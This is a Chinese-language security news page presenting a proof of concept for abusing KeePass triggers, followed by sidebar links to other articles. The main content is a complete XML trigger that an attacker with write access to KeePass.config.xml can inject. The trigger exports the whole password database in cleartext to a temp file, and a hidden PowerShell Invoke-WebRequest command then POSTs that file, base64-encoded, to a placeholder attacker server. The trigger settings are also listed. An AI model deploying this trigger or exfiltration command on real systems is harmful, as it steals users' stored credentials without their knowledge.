服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

漏洞速递

日期: 来源:网络安全编程与黑客程序员收集编辑:

(1) 对 KeePass 配置文件具有写入权限的攻击者KeePass.config.xml可以注入以下触发器,例如:

<?xml version="1.0" encoding="utf-8"?><TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">  <Triggers>    <Trigger>      <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>      <Name>exploit</Name>      <Events>        <Event>          <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>          <Parameters>            <Parameter>0</Parameter>            <Parameter />          </Parameters>        </Event>      </Events>      <Conditions />      <Actions>        <Action>          <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>          <Parameters>            <Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>            <Parameter>KeePass XML (2.x)</Parameter>            <Parameter />            <Parameter />          </Parameters>        </Action>        <Action>          <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>          <Parameters>            <Parameter>PowerShell.exe</Parameter>            <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>            <Parameter>False</Parameter>            <Parameter>1</Parameter>            <Parameter />          </Parameters>        </Action>      </Actions>    </Trigger>  </Triggers></TriggerCollection>


(2) 受害者将打开 keePass 作为正常活动,保存更改等......,触发器将在后台执行,将凭据泄露给攻击者服务器

触发 PoC 详细信息

KeePass XML (2.x) formata) 触发器会将包含所有凭据的 keepass 数据库导出到以下(cleartext) 路径中,例如:

c:\Users\John\AppData\Local\Temp\exploit.xml 

b) 导出文件后,可以定义第二个操作来使用Powershell.exe和编码为exfiltrate XML 数据,base64例如:

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

c) 数据将泄露到攻击者的 Web 服务器,例如:

触发 PoC 值


Name: TriggerEvents: Saved database file | [Equals]Conditions: <empty>Actions: 
(1) Export active database File/URL: c:\Users\John\AppData\Local\Temp\exploit.xmlFile/Fortmat: KeePass XML (2.x)
(2) Execute command line / URLFile/URL: PowerShell.exeArguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))Window style: Hidden

证书...

PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password


相关阅读

  • 黑客断网攻击与监听演示!

  • 作者:csdn-Tr0e原文链接:http://aaqv.net/240da前言借助ARP欺骗让你回到“村里还没接网线”的年代、同时还能让你的PC主机或者手机的部分隐私处于“裸奔”状态……严正声明:本
  • 实战 | 漏洞挖掘之众测厂商 Ticket劫持漏洞

  • 0x00 前言文章中的项目地址统一修改为: test.com 保护厂商也保护自己0x01 前期准备受害者账号: 18******977攻击者账号: tsetaaaa攻击者服务器:123.207.33.78攻击文件:img_ref
  • 细述SQL注入攻击杀伤链的七个步骤

  • 网络攻击会对一家组织的系统造成巨大的破坏,而且近些年来越来越频繁。SQL注入攻击是一种破坏性特别大的攻击。这种形式的攻击指,通过使用结构化查询语言(SQL),利用网站或应用程序
  • 2023-02微软漏洞通告

  • 微软官方发布了2023年2月的安全更新。本月更新公布了80个漏洞,包含38个远程执行代码漏洞、12个特权提升漏洞、10个拒绝服务漏洞、9个身份假冒漏洞、8个信息泄露漏洞、2个安全
  • 探讨以ChatGPT为代表的AI安全思考

  • ‍‍19世纪,艾伦图灵提出了机器改变自己的指令并从经验中学习的可能性,被誉为AI之父的图灵为进入 21世纪AI领域取得的巨大进步铺平了道路。如今,我们的生活当中使用的每一项服

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 漏洞速递

  • (1) 对 KeePass 配置文件具有写入权限的攻击者KeePass.config.xml可以注入以下触发器,例如:<?xml version="1.0" encoding="utf-8"?><TriggerCollection xmlns:xsi="http://ww
  • 黑客断网攻击与监听演示!

  • 作者:csdn-Tr0e原文链接:http://aaqv.net/240da前言借助ARP欺骗让你回到“村里还没接网线”的年代、同时还能让你的PC主机或者手机的部分隐私处于“裸奔”状态……严正声明:本
  • 千万别在有WiFi的房间里摆这种姿势,只因……

  • 量子位(ID:QbitAI)明敏 丰色 发自 凹非寺现在,只用WiFi就能“看”到你在房间里干啥了……(你…干…嘛……啊啊啊啊)多人追踪也是so easy:过程中完全不需要拍下图像、不需要摄像头。
  • 【每日资讯简报】2月18日 周六

  • 【每日资讯简报,一分钟知天下事】2月18日 星期六 农历正月廿八1、发改委:本轮油价不作调整,业内分析新一轮变化率或以负向开端;2、报告:进城农民家庭维系正常生活月需3000元,大